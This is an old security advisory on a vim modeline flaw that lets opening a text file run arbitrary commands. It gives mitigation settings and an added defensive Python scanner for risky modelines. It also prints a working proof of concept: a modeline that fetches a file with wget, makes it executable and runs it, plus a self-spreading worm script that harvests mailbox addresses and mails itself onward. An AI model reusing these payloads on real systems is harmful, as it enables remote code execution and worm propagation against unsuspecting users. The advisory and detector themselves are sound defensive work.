A vulnerability in VIM found by Georgi Guninski allows a remote attacker to cause the execution of arbitrary code whenever an unsuspecting user opens a text file. This vulnerability can be further extended into a worm, as illustrated below.
Credit:
Georgi Guninski's advisory can be found at:
http://www.guninski.com/vim1.html
The information has been provided by Nostradamus and Georgi Guninski.
Protection:
Put the following in your ~/.vimrc or better in a system wide config file:
set modelines=0
It disables modelines without breaking significant functionality; there is no compatibility in this area between vim and emacs anyway.
Even when/if vim is fixed, Georgi Guninski strongly recommends keeping this setting to protect against similar exploits in the future.
Emacs users are recommended to disable local variables, which may pose a similar threat, by putting the following in ~/.emacs:
;; disable local variables
(setq enable-local-variables nil)
How it works:
There is a small bug in vim which allows command execution through modelines.
The following two lines execute the ls command on the target host if the file is opened with vim (try it out with "vi viexpl.txt").
(In all of the examples below, the letter i of vim has been replaced with an ! so that the lines are not interpreted as modelines.)
/* v!m:set foldmethod=expr: */
/* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"ms_sux"): */
The output is:
-- START OF OUTPUT --
"viexpl.txt" 2L, 113CREADME TODO commands.sh commands.sh.long mail.txt proof.txt test.txt viexpl.txt viworm.txt worm.sh
ms_sux:
-- END OF OUTPUT --
The worm uses this bug to download a file to the /tmp directory.
-- START OF VIWORM FILE --
/* v!m:set foldmethod=expr: */
/* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","cd\ /tmp;wget\ 127.0.0.1/joni8172ff3g;chmod\ 0755\ /tmp/joni8172ff3g;/tmp/joni8172ff3g"),"ms_sux"): */
-- END OF VIWORM FILE --
The above file does the following:
* Changes to /tmp
* Downloads the file joni8172ff3g into /tmp with wget from 127.0.0.1 (in the proof of concept 127.0.0.1 is localhost; a real attacker would point it at a web server under their control)
* Makes it executable with chmod 0755
* Executes the file
Here is the code of the downloaded file:
-- START OF FILE --
echo 'JuliaBabe1234@gmx.net'>>/var/spool/mail/$USER;echo 'CharlesBob1234@gmx.net'>>~/mbox;cat ~/mbox /var/spool/mail/*|grep '@'|cut -d ' ' -f 2|grep '@'|grep -v '<'|grep -v '"'|grep -v ','|sort|uniq > /tmp/h0oVeR183257;for i in `cat /tmp/h0oVeR183257`;do echo -e "/usr/sbin/sendmail $i <<EOFF\nSubject: Hi\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: attachment;
filename=\"concept.txt\"\n\n/* v!m:set foldmethod=expr: */\n/* v!m:set foldexpr=confirm(libcall(\"/lib/libc.so.6\",\"system\",\"cd\ /tmp;wget\ 127.0.0.1/joni8172ff3g;chmod\ 0755\ /tmp/joni8172ff3g;/tmp/joni8172ff3g\"),\"ms_sux\"): */\n\nEOFF">/tmp/f33lOe18352;. /tmp/f33lOe18352 2> /dev/null;done
-- END OF FILE --
* Appends a fake address to /var/spool/mail/$USER (creating the file if it does not exist).
* Appends a fake address to ~/mbox (creating the file if it does not exist).
* Extracts mail addresses from ~/mbox and /var/spool/mail/* with grep and grep -v.
* Sorts the addresses and makes them unique (only one entry per address).
* For every address, generates a sendmail invocation with the subject "Hi" and the viworm file attached as concept.txt.
* Runs the generated script, sending stderr to /dev/null.
If the other users open the mail with the vi editor, the worm file is downloaded and executed.
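The two defensive checks a practitioner wants after reading the above are: does a given vimrc really leave modelines switched off (the Protection section), and which lines of an incoming text file carry a modeline that vim would honour and whose options can run code (the "How it works" section)? The following Python is an added example written for this page; it is not part of the advisory, of Guninski's proof of concept, or of vim. It assumes vim's stock defaults of 'modeline' on and 'modelines' set to 5, mirrors vim's rule of reading modelines only from the first and last N lines, and treats foldexpr, libcall(, system( and shell= as the code-executing constructs to flag; that option list is a heuristic chosen for the example, and every vimrc and file content below is constructed. It generalises the page's single foldexpr/libcall case to any modeline that uses one of those constructs.

```python
"""Defender-side checks for the vim modeline issue on this page (added example,
not part of the advisory or of vim itself).

  effective_modeline_settings(vimrc) -> (modeline_on, modelines)
  vimrc_modelines_disabled(vimrc)    -> True if that config leaves modelines off
  find_risky_modelines(text, n)      -> modelines vim would honour whose options
                                        can run code (foldexpr / libcall / system)
All sample contents below are constructed for this example.
"""
import re

# Assumed stock vim defaults: 'modeline' on, 'modelines' = 5.
DEFAULT_MODELINE_ON = True
DEFAULT_MODELINES = 5

# A modeline introducer ("vim:", "vi:" or "ex:") at line start or after whitespace,
# optionally followed by "set"/"se"; the group captures the option text.
_MODELINE_RE = re.compile(r'(?:^|\s)(?:vim?|ex):\s*(?:set?\s+)?(.*)$')
# Heuristic list of option names/calls that turn a modeline into code execution.
_RISKY_RE = re.compile(r'foldexpr|libcall\s*\(|system\s*\(|\bshell\s*=', re.IGNORECASE)


def effective_modeline_settings(vimrc_text):
    """Replay the 'set' lines of a vimrc; the last assignment of each option wins."""
    modeline_on, count = DEFAULT_MODELINE_ON, DEFAULT_MODELINES
    for raw in vimrc_text.splitlines():
        line = raw.split('"', 1)[0].strip()          # drop vimscript comments
        if not re.match(r'^se(?:t)?\s', line):       # only "set"/"se" lines matter here
            continue
        for tok in line.split()[1:]:
            if tok == 'nomodeline':
                modeline_on = False
            elif tok == 'modeline':
                modeline_on = True
            else:
                m = re.match(r'^modelines=(\d+)$', tok)
                if m:
                    count = int(m.group(1))
    return modeline_on, count


def vimrc_modelines_disabled(vimrc_text):
    """True when the config leaves modelines off, via 'nomodeline' or 'modelines=0'."""
    modeline_on, count = effective_modeline_settings(vimrc_text)
    return (not modeline_on) or count == 0


def find_risky_modelines(text, modelines=DEFAULT_MODELINES):
    """Return [(line_number, option_text)] for modelines in the first/last `modelines`
    lines (the only ones vim reads) whose options contain code-executing constructs."""
    lines = text.splitlines()
    n = len(lines)
    candidates = set(range(min(modelines, n))) | set(range(max(0, n - modelines), n))
    hits = []
    for i in sorted(candidates):
        m = _MODELINE_RE.search(lines[i])
        if m and _RISKY_RE.search(m.group(1)):
            hits.append((i + 1, m.group(1).strip()))
    return hits


# Constructed samples.
SAMPLE_VIMRC_OPEN = 'syntax on\nset modelines=5   " stock value\n'
SAMPLE_VIMRC_HARDENED = 'syntax on\nset modelines=0  " the advisory\'s recommendation\n'

SAMPLE_FILE = "\n".join([
    '/* vim:set foldmethod=expr: */',
    '/* vim:set foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"x"): */',
    'ordinary text',
    '# vim: ts=4 sw=4 et',          # harmless formatting modeline, must not be flagged
])

# The same risky line buried in the middle of an 11-line file: outside vim's first/last-5 window.
MIDDLE_FILE = "\n".join(['x'] * 5 + ['/* vim:set foldexpr=libcall("a","b","c"): */'] + ['y'] * 5)


if __name__ == "__main__":
    for name, rc in (("open", SAMPLE_VIMRC_OPEN), ("hardened", SAMPLE_VIMRC_HARDENED)):
        print(name, effective_modeline_settings(rc), "disabled:", vimrc_modelines_disabled(rc))
    print("risky modelines:", find_risky_modelines(SAMPLE_FILE))
    print("buried, modelines=5:", find_risky_modelines(MIDDLE_FILE))
```

Run the file directly to see the checks applied to the constructed samples, or import it and point find_risky_modelines at the text of an attachment before it is opened. The first/last-N window matters for triage: a modeline sitting in the middle of a long file is never read by vim, so only the lines at either end of a file can carry this attack, and the scanner deliberately ignores the rest to avoid noise. The same window is why an attacker's modeline appears at the very top of the proof-of-concept file above.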